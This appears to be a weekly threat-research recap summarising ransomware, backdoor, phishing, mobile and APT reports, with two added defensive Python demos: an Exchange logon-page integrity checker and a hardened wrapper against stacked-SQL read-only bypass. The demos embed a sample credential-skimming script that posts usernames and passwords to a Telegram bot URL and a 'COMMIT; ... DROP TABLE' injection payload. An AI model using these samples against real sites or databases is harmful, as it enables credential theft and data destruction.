The weekly Cybersecurity Threat Research recap highlights significant ransomware operations, including SharePoint exploitation by WarLock and advanced RaaS variants targeting multiple platforms. It also covers emerging backdoors like Cornflake V3 and PipeMagic, sophisticated phishing campaigns such as Salty 2FA, and targeted APT campaigns like APT36 and Static Tundra. #WarLock #CornflakeV3
Ransomware & extortion
- Rapid SharePoint RCE exploitation leading to enterprise-wide encryption and exfiltration; the actor deployed the WarLock toolkit and leveraged SYSTEM privileges for lateral movement. WarLock: From SharePoint Exploit to Ransomware – TrendMicro
- New RaaS with advanced anti-analysis, UAC bypasses and expanded exfiltration options; the operator markets builder/subscription services. Bqtlock Ransomware & Variants – K7 Labs
- Evolved RaaS family targeting Windows/Linux/ESXi with TOR leak sites and advanced obfuscation (Boramae-related variant noted). Beast Ransomware Profile – SOCRadar
Backdoors, loaders & modular frameworks
- Campaigns using fake CAPTCHA (ClickFix) lures and PowerShell/JS droppers to deliver the Node.js/PHP CORNFLAKE.V3 backdoor, which performs AD reconnaissance and Kerberoasting. Cornflake V3 Backdoor – Google Cloud
- Modular named-pipe backdoor masquerading as trojanized ChatGPT apps; exploits CVE-2025-29824 and manages in-memory modules for payload delivery/injection. PipeMagic Analysis – Microsoft
- New and stealthy loaders/botnets: QuirkyLoader (.NET side-loading/process hollowing delivering multiple RATs/stealers) and the stealthy Java loader "SoupDealer" used in targeted phishing. QuirkyLoader – IBM X-Force
- Delphi x86 implant using heavy obfuscation, anti-analysis and persistence for surveillance/exfiltration; tracked as DBatLoader. DBatLoader – DeepInstinct
- Novel Linux backdoor masquerading as a PAM library to provide stealthy SSH auth bypass and persistence; tracked as Plague. Plague Linux PAM Backdoor – PolySwarm
- New Gh0st-based RAT targeting finance; uses steganography to hide shellcode and downloads plugins/password stealers; tracked as GodRAT. GodRAT – Kaspersky Securelist
Phishing, credential theft & PhaaS
- Spoofed SendGrid emails and open redirects lure victims to credential harvesters capturing account logins. SendGrid-themed Credential Harvesting – Cofense
- AI website builder abused at scale for phishing, MFA/AiTM and crypto drainers; tens of thousands of malicious URLs observed. Lovable AI Abuse for Phishing – Proofpoint
- New Phishing-as-a-Service framework (Salty 2FA) uses multistage obfuscated JS and characteristic domain patterns to steal Microsoft 365 creds and bypass 2FA. Salty 2FA Technical Analysis – ANY.RUN
- High-value social-engineering group Scattered Spider (UNC3944) continues to evolve its phishing kits (Evilginx-style) and its targeting of corporate accounts. Scattered Spider Profile – DarkAtlas
- Large smishing wave impersonating UK government services with short-lived domains and token/websocket exfiltration behavior. UK GOV PCN/Winter Fuel Smishing – Validin
- Targeted stealer campaigns (copyright/corporate-footprint lures) that focus on browser cookies and social accounts; Noodlophile evolution noted. Noodlophile Stealer – Morphisec
- Affiliate ecosystems monetizing stolen data (Lumma, Vidar, Stealc) with proxy/VPN/antidetect enablers; monitor exfiltration and underground forums. Lumma Affiliate Ecosystem – Recorded Future
- JavaScript keyloggers injected into Exchange auth pages exfiltrate creds via HTTP/Telegram/DNS; watch for modifications to /owa/auth/logon.aspx. Exchange JS Keyloggers – PT ESC
- VPS abuse to enable stealthy SaaS compromises (inbox rules, MFA bypass, token theft) and large-scale phishing footholds. SaaS Hijacks via VPS Abuse – Darktrace
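A check for the logon-page recommendation above, added here as an example and not taken from the PT ESC report: it hashes the page against a known-good baseline and flags inline script blocks that carry exfiltration markers or reference hosts outside an allowlist. The two page fragments, the flogon.js path and the Telegram endpoint are constructed for the demo; the marker list is a heuristic assumption to tune per environment.

```python
import hashlib
import re

# Constructed stand-in for a clean logon page; the real Exchange file is larger and versioned.
BASELINE_PAGE = """<form action="/owa/auth.owa" method="POST" name="logonForm">
<input id="username" name="username" type="text">
<input id="password" name="password" type="password">
<script type="text/javascript" src="/owa/auth/15.2.1544/scripts/premium/flogon.js"></script>
</form>"""

# Constructed example of the class of modification described above: an inline script hooked to
# the form submission that posts the typed credentials to an external endpoint.
INJECTED_PAGE = BASELINE_PAGE.replace("</form>", """<script>
document.logonForm.onsubmit = function () {
  var u = document.getElementById("username").value;
  var p = document.getElementById("password").value;
  fetch("https://api.telegram.org/bot000000:EXAMPLE/sendMessage?chat_id=1&text=" + encodeURIComponent(u + ":" + p));
};
</script></form>""")

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
# Heuristic markers chosen for this example (assumption); extend with what your kits actually use.
EXFIL_HINTS = ("api.telegram.org", "xmlhttprequest", "fetch(", "navigator.sendbeacon", "new image(", "websocket(")


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def audit_logon_page(page, baseline_hash, trusted_hosts=()):
    """Return a list of findings: a hash mismatch against the known-good file, plus any script
    block that contains exfiltration markers or references a host outside the allowlist."""
    findings = []
    if sha256_hex(page) != baseline_hash:
        findings.append("content hash differs from baseline")
    for attrs, body in SCRIPT_RE.findall(page):
        hosts = {h.lower() for h in HOST_RE.findall(attrs + body)}   # src= and inline references
        untrusted = sorted(hosts - {h.lower() for h in trusted_hosts})
        lowered = body.lower()
        hints = [h for h in EXFIL_HINTS if h in lowered]
        if hints or untrusted:
            findings.append("suspicious script: hints=%s hosts=%s" % (hints, untrusted))
    return findings


if __name__ == "__main__":
    baseline = sha256_hex(BASELINE_PAGE)
    print(audit_logon_page(BASELINE_PAGE, baseline))
    print(audit_logon_page(INJECTED_PAGE, baseline))
```

On a live server, feed this the logon.aspx from the owa\auth directory under the Exchange FrontEnd HttpProxy path and a hash recorded right after a known-good cumulative update; because updates legitimately change the file, treat a hash mismatch as a trigger to diff the page, not as a verdict on its own, and let the script-block findings point at what changed.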
Mobile & endpoint threats
- Android banking trojan Anatsa/TeaBot expanded its target list (831+ apps) and uses runtime DES decryption, device checks and Google Play decoys for updates. Anatsa (TeaBot) Updates – Zscaler
- Sideloaded APK droppers delivering the Android SpyNote RAT via cloned Play Store pages and DEX injection with anti-analysis. SpyNote Malware – DomainTools
- NFC-relay Android malware targeting Brazilian banking (tap-to-pay fraud) delivered via fake Play pages under an affiliate MaaS model; tracked as PhantomCard. PhantomCard NFC Relay – Zimperium
- APK lure impersonating an Indian energy subsidy scheme to steal UPI credentials and SMS; repo/FCM mitigations applied. Android "Energy Subsidy" Stealer – McAfee
- macOS malvertising and one-liner installers delivering SHAMOS (an AMOS variant) to steal Keychain data and notes; CrowdStrike Falcon blocked widespread attempts. SHAMOS on macOS – CrowdStrike
- Rooting/jailbreak frameworks (KernelSU, Magisk, APatch) have exploitable weaknesses that can let malicious apps gain full device control. Rooting Framework Risks – Zimperium
Abuse of legitimate tools, supply-chain & monetization schemes
- Phishing campaign used a fake digital-signature patch to install the legitimate remote-management tool Action1 for unauthorized remote access. Fake Action1 Patch – CERT-AGID
- Fake YouTube downloader pages distributing proxyware installers (WinMemoryCleaner droppers) that install clients like HoneyGain/Infatica and run scheduled Node.js/PowerShell tasks. Proxyware Distribution via Fake Downloader – AhnLab
- Attackers exploiting GeoServer RCE (CVE-2024-36401) to deploy SDKs/apps that covertly sell victims' bandwidth as residential proxies. SDK Abuse to Monetize Bandwidth – Unit42
- Open-source ecosystem abuse: malicious Go module masquerading as an SSH brute-forcer exfiltrates the first successful credentials to a Telegram bot. Malicious Go Module – Socket
- Large-scale trojan campaign force-installs malicious Chrome/Edge extensions via fake installer sites, scheduled tasks and registry/policy abuse; 300k+ affected. Extension Trojans via Fake Installers – ReasonLabs
Notable APT & targeted campaigns
- APT36 campaigns against Indian targets used weaponized .desktop files and Google Drive droppers to deliver Go-based ELF payloads targeting BOSS Linux systems (WebSocket C2s observed). APT36 Targeting BOSS Linux – Cyfirma
- Persistent campaign (UAC-0057 / UNC1151) deploying weaponized XLS files (obfuscated VBA) against Ukraine/Poland with DLL implants and web C2s. UAC-0057 Targeting Ukraine & Poland – HarfangLab
- Long-running Russian espionage group Static Tundra abuses EoL/unpatched network gear (Cisco Smart Install, CVE-2018-0171) to steal configs and maintain long-term access. Static Tundra (FSB-linked) – Talos
- EncryptHub operation combining social engineering, Teams-based remote access and exploitation of CVE-2025-26633 to deliver backdoors and steal data. EncryptHub Campaign – Trustwave SpiderLabs
Vulnerabilities, cloud & infra research
- AWS Resource Explorer ListResources allowed quiet resource enumeration because it wasn't CloudTrail-logged by default; AWS reclassified it as a management event after disclosure. CloudTrail-free AWS enumeration – Datadog
- SQL injection in a reference Postgres MCP server could chain stacked statements (e.g., COMMIT; DROP SCHEMA) to break out of the read-only transaction wrapper and perform arbitrary writes; patches released in forks. MCP Postgres SQLi Case Study – Datadog
- Research into programmatically starting the WebClient service shows multiple vectors, but a final ETW consumer descriptor limits remote start without elevated token conditions; relevant to NTLM relay mitigations. Will WebClient Start? – SpecterOps
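The read-only bypass in the MCP Postgres item above, reproduced as an added example that is not the MCP server's own code: a wrapper that sets a read-only guard and hands caller-supplied SQL to a multi-statement executor, next to a hardened version that accepts exactly one allowlisted statement through a single-statement API. SQLite via Python's sqlite3 stands in for Postgres so it runs offline (PRAGMA query_only plays the role of the READ ONLY transaction; this substitution, the schema and the payload are all assumptions of the demo), and the splitter understands Postgres quoting so the same check works on real Postgres input.

```python
import re
import sqlite3

# Constructed demo schema standing in for the target database.
SEED_SQL = """
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO users (name) VALUES ('alice'), ('bob');
"""

DOLLAR_TAG = re.compile(r"\$[A-Za-z_]*\$")


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SEED_SQL)
    return con


def table_names(con):
    return [r[0] for r in con.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]


def split_statements(sql):
    """Split SQL on ';' while skipping quoted strings, quoted identifiers, comments and
    Postgres $tag$ dollar-quoted blocks, so a ';' inside a literal is not a boundary."""
    stmts, buf, i, n = [], [], 0, len(sql)
    while i < n:
        ch = sql[i]
        if ch in ("'", '"'):                        # literal or identifier; '' escapes a quote
            j = i + 1
            while j < n:
                if sql[j] == ch:
                    if j + 1 < n and sql[j + 1] == ch:
                        j += 2
                        continue
                    break
                j += 1
            buf.append(sql[i:j + 1])
            i = j + 1
        elif sql.startswith("--", i):               # line comment: drop to end of line
            j = sql.find("\n", i)
            i = n if j < 0 else j + 1
        elif sql.startswith("/*", i):               # block comment: drop to closing marker
            j = sql.find("*/", i + 2)
            i = n if j < 0 else j + 2
        elif ch == "$" and (m := DOLLAR_TAG.match(sql, i)):   # $tag$ ... $tag$
            tag = m.group(0)
            j = sql.find(tag, i + len(tag))
            end = n if j < 0 else j + len(tag)
            buf.append(sql[i:end])
            i = end
        elif ch == ";":
            text = "".join(buf).strip()
            if text:
                stmts.append(text)
            buf = []
            i += 1
        else:
            buf.append(ch)
            i += 1
    text = "".join(buf).strip()
    if text:
        stmts.append(text)
    return stmts


def run_readonly_vulnerable(con, user_sql):
    """The vulnerable pattern: a read-only guard is set, the caller's SQL is concatenated in, and the
    whole string goes to a multi-statement executor. COMMIT ends the wrapper; what follows runs free."""
    con.executescript("BEGIN; PRAGMA query_only = 1; " + user_sql + "; ROLLBACK; PRAGMA query_only = 0;")


def run_readonly_hardened(con, user_sql):
    """Hardened form: exactly one statement, an allowlisted verb, and a single-statement execute()
    call (sqlite3's execute() refuses stacked SQL outright). The guard is set by the server, never
    inside the same script as the caller's text."""
    stmts = split_statements(user_sql)
    if len(stmts) != 1:
        raise ValueError("expected exactly one statement, got %d" % len(stmts))
    stmt = stmts[0]
    if not re.match(r"(?is)^\s*(select|with)\b", stmt):
        raise ValueError("only SELECT/WITH statements are accepted")
    con.execute("PRAGMA query_only = 1")
    try:
        return con.execute(stmt).fetchall()
    finally:
        con.execute("PRAGMA query_only = 0")


# Constructed payload: the read query, a stacked COMMIT that ends the wrapper, then writes.
PAYLOAD = "SELECT * FROM users; COMMIT; PRAGMA query_only = 0; DROP TABLE users; BEGIN"


def demo():
    vuln = fresh_db()
    run_readonly_vulnerable(vuln, PAYLOAD)
    hard = fresh_db()
    try:
        run_readonly_hardened(hard, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "vulnerable_tables": table_names(vuln),      # [] : users was dropped despite the guard
        "hardened_rejected": rejected,               # True
        "hardened_tables": table_names(hard),        # ['users']
        "hardened_rows": run_readonly_hardened(hard, "SELECT name FROM users ORDER BY id"),
    }


if __name__ == "__main__":
    print(demo())
```

The verb allowlist is only a secondary check (in Postgres, WITH can introduce a data-modifying CTE); the controls that actually hold are single-statement execution and connecting as a role that has no write privileges, so that a query which slips past the parser still cannot commit a change.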
Cryptojacking & illicit mining
- Long-running cryptomining group TA-NATALSTATUS exploits exposed Redis instances to gain root and deploy rootkit-style miners that kill rival miners and persist across thousands of hosts. TA-NATALSTATUS Cryptojacking Dossier – CloudSEK